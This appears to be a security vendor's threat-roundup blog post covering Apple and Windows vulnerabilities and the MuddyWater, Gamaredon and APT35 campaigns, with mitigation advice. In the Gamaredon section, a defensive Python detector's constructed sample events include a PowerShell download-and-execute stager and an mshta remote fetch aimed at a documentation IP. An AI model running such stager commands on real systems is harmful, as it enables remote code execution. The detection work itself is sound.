Top Middle East Cyber Threats – 7 February 2022


At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:

Apple addresses two zero-day vulnerabilities

Apple issued security updates to address two zero-day vulnerabilities: one was publicly disclosed before a fix was available, and the other was exploited in the wild by attackers to gain access to iPhones and Macs.

The first, CVE-2022-22587, is a memory corruption bug in the IOMobileFrameBuffer kernel extension affecting iOS, iPadOS and macOS Monterey. A malicious application that exploits it gains arbitrary code execution with kernel privileges on the device. Apple's advisory states that the vulnerability may have been actively exploited.

The second, CVE-2022-22594, is a cross-origin bug in the IndexedDB API of WebKit, the engine behind Safari and every browser on iOS and iPadOS. A malicious website can read the names of IndexedDB databases created by other origins, which reveals which sites the user has visited and, where a service embeds a user identifier in a database name, can identify the user in real time. iOS 15.3 and iPadOS 15.3 fix ten CVEs in total, including a WebKit memory-safety bug that could lead to arbitrary code execution from maliciously crafted web content, according to Apple's security updates page.

RECOMMENDATIONS

  • Update iPhones and iPads to iOS 15.3 / iPadOS 15.3 and Macs to the macOS Monterey release that contains these fixes; CVE-2022-22587 is reported as exploited in the wild, so treat the rollout as urgent.
  • Until the update is applied, treat all browsing on affected devices as exposed to CVE-2022-22594: the bug is in the shared WebKit engine, not in Safari alone.

Public exploit released for Windows vulnerability CVE-2022-21882

A security researcher recently published a working exploit for a Windows local privilege escalation vulnerability. It allows a local user with limited privileges to obtain SYSTEM-level (administrative) privileges on Windows 10. With it, a threat actor who already has a foothold on a compromised host can elevate their permissions to move laterally within the network, create new administrative users, or execute privileged commands.

As part of the January 2022 Patch Tuesday, Microsoft fixed this Win32k elevation of privilege vulnerability, tracked as CVE-2022-21882. It is a bypass of the patch for CVE-2021-1732, a Win32k bug that was itself actively exploited before Microsoft fixed it in February 2021.

The flaw affects all supported versions of Windows 10 that have not received the January 2022 Patch Tuesday updates; consult Microsoft's advisory for the full list of affected builds, which also includes the Windows Server releases that share the Win32k code base.

RECOMMENDATIONS

  • Apply the January 2022 (or any later) cumulative update to every Windows 10 host; with exploit code public, an unpatched host should be treated as trivially escalatable by any user or malware that lands on it.
  • Watch for the post-exploitation activity described above: unexpected creation of local administrator accounts, and low-privileged user sessions spawning processes as SYSTEM.

Iranian APT MuddyWater utilizes malicious documents

Cisco Talos has observed a new campaign attributed to MuddyWater — an APT group recently linked to Iran’s Ministry of Intelligence and Security (MOIS).

The threat actor conducted various campaigns against entities spread throughout the USA, Europe, Middle East and South Asia.

A typical TTP of the group is heavy use of scripting in its infection chains, with PowerShell and Visual Basic scripts delivered through malicious documents and combined with frequent use of living-off-the-land binaries (LoLBins), so that much of the activity looks like legitimate Windows tooling.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files or attachments.
  • Don't allow macros in MS Office files from unknown or untrusted sources.
  • Enable software restriction policies and application whitelisting.
  • Ensure that the email server is configured to block suspicious attachments.
  • Enforce the Restricted PowerShell script execution policy for end users (the execution policy is not a security boundary and is bypassed with a single command-line switch, so pair it with application whitelisting and PowerShell logging).
  • Monitor your network for abnormal behaviours and for shared indicators of compromise (IoCs).
  • Block the indicators of compromise (IoCs) in the respective security controls organization-wide.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing and other suspicious emails.

Russian hackers use eight new malware payloads in attacks

The Russia-linked hackers known as ‘Gamaredon’ (aka Armageddon or Shuckworm) were spotted deploying eight custom binaries in recent cyber-espionage operations.

The threat actor uses spear-phishing emails carrying macro-laced Word documents as the initial access vector. Enabling the macro launches a VBS file that drops "Pteranodon", a well-documented backdoor that Gamaredon has been developing and refining for almost seven years.

Recent attacks still begin with the same phishing emails, but the chain now delivers eight distinct custom payloads rather than one.
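The chain just described and the MuddyWater chain above (malicious document, then VBS or PowerShell, then LOLBins) leave a consistent trace in process-creation telemetry. The following Python is an added example, not code from Help AG, Cisco Talos or Symantec: it assumes Sysmon Event ID 1 field names (ParentImage, Image, CommandLine) exported as JSON lines, and the events it scans are constructed for the example, including the 203.0.113.10 documentation address.

```python
"""Flag script-heavy infection chains in Windows process-creation telemetry.

Added example, not code from Help AG, Cisco Talos or Symantec. It encodes the
pattern the MuddyWater and Gamaredon chains above share: an Office app spawning
a script host or LOLBin, PowerShell with an encoded or hidden command line, and
LOLBins pulling remote content. Field names follow Sysmon Event ID 1
(ParentImage, Image, CommandLine); every event below is constructed.
"""
import base64
import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
LOLBINS = SCRIPT_HOSTS | {"rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
FETCH_CAPABLE = LOLBINS - {"wscript.exe", "cscript.exe", "cmd.exe"}

# powershell.exe accepts abbreviated switches: -e, -ec, -en and -enc all mean -EncodedCommand.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS_FLAGS_RE = re.compile(
    r"(?i)\s-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b")
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\"]+")
# Script files launched from directories an unprivileged user can write to.
USER_WRITABLE_SCRIPT_RE = re.compile(
    r'(?i)\\(?:Users\\[^\\]+\\AppData|Users\\Public|Windows\\Temp|ProgramData)\\[^\s"]*\.(?:vbs|vbe|js|jse|hta|ps1|wsf)\b')


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_for_powershell(script: str) -> str:
    """Produce what -EncodedCommand expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> list:
    """Apply the chain rules to one process-creation event; return its findings."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    findings = []

    def hit(rule, severity, detail):
        findings.append({"rule": rule, "severity": severity, "detail": detail})

    if parent in OFFICE_APPS and image in LOLBINS:
        hit("office_spawns_script_host", "high", f"{parent} -> {image}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hit("powershell_encoded_command", "high", decoded)
    flags = SUSPICIOUS_FLAGS_RE.search(cmd)
    if image in {"powershell.exe", "pwsh.exe"} and flags:
        hit("powershell_suspicious_flags", "medium", flags.group(0).strip())
    url = URL_RE.search(cmd + " " + (decoded or ""))  # visible line plus decoded payload
    if image in FETCH_CAPABLE and url:
        hit("lolbin_remote_fetch", "high", url.group(0))
    path = USER_WRITABLE_SCRIPT_RE.search(cmd)
    if image in SCRIPT_HOSTS and path:
        hit("script_from_user_writable_path", "medium", path.group(0))
    return findings


def scan(json_lines) -> list:
    """Run analyze() over JSON-lines telemetry; return only events with findings."""
    hits = []
    for index, line in enumerate(json_lines):
        if not line.strip():
            continue
        event = json.loads(line)
        findings = analyze(event)
        if findings:
            hits.append({"index": index, "image": basename(event.get("Image", "")), "findings": findings})
    return hits


# Constructed events: 0 = macro document -> VBS (Gamaredon-style), 1 = hidden encoded PowerShell
# stager (MuddyWater-style), 2 = Word launching mshta against a URL, 3 = benign admin script.
# 203.0.113.10 is a documentation (TEST-NET-3) address, not a real indicator.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"
_WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": _WORD, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe //B "C:\Users\alice\AppData\Local\Temp\invoice.vbs"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(_STAGER)},
    {"ParentImage": _WORD, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.10/p.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_LOG.splitlines()), indent=2))
```

Run stand-alone, the script reports the first three constructed events and stays silent on the signed administrative script. The same rules translate directly into SIEM queries, and the Office-to-script-host rule is what the Attack Surface Reduction rule "Block all Office applications from creating child processes" enforces preventively. Note that the -EncodedCommand stager in event 1 runs as a command string, which the Restricted execution policy does not stop, so that recommendation needs application whitelisting and PowerShell logging alongside it.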

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files or attachments.
  • Don't allow macros in MS Office files from unknown or untrusted sources.
  • Enable software restriction policies and application whitelisting.
  • Ensure that the email server is configured to block suspicious attachments.
  • Enforce the Restricted PowerShell script execution policy for end users (the execution policy is not a security boundary and is bypassed with a single command-line switch, so pair it with application whitelisting and PowerShell logging).
  • Monitor your network for abnormal behaviours and for shared indicators of compromise (IoCs).
  • Block the indicators of compromise (IoCs) in the respective security controls organization-wide.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing and other suspicious emails.

Iranian state-sponsored group APT35 linked to Memento ransomware

Security researchers have found links between APT35 (aka Phosphorus, Charming Kitten), one of Iran’s most active cyber-espionage groups, and Memento, a ransomware strain that was deployed in attacks in the fall of 2021.

Iranian groups such as APT35, which mostly operate as contractors for the Iranian government, scan the internet for widely deployed server software and use exploits for recently disclosed vulnerabilities to take control of unpatched systems. If a compromised network belongs to an entity of interest to the Iranian government, they deploy malware to harvest information from the hacked systems and to maintain persistent access for future intelligence collection.

Recent research by Cybereason found that APT35 developed a new PowerShell backdoor named PowerLess and deployed it on compromised Microsoft Exchange servers last year, using it against its intelligence-collection targets.

While investigating this new threat, researchers found several clues that linked APT35’s infrastructure to past attacks of the Memento ransomware gang.

This included shared IP addresses, similar file naming schemes, and similar URL directory patterns — findings that led researchers to believe that APT35 operators were likely behind the Memento ransomware as well.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files or attachments.
  • Don't allow macros in MS Office files from unknown or untrusted sources.
  • Enable software restriction policies and application whitelisting.
  • Ensure that the email server is configured to block suspicious attachments.
  • Enforce the Restricted PowerShell script execution policy for end users (the execution policy is not a security boundary and is bypassed with a single command-line switch, so pair it with application whitelisting and PowerShell logging).
  • Monitor your network for abnormal behaviours and for shared indicators of compromise (IoCs).
  • Block the indicators of compromise (IoCs) in the respective security controls organization-wide.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing and other suspicious emails.
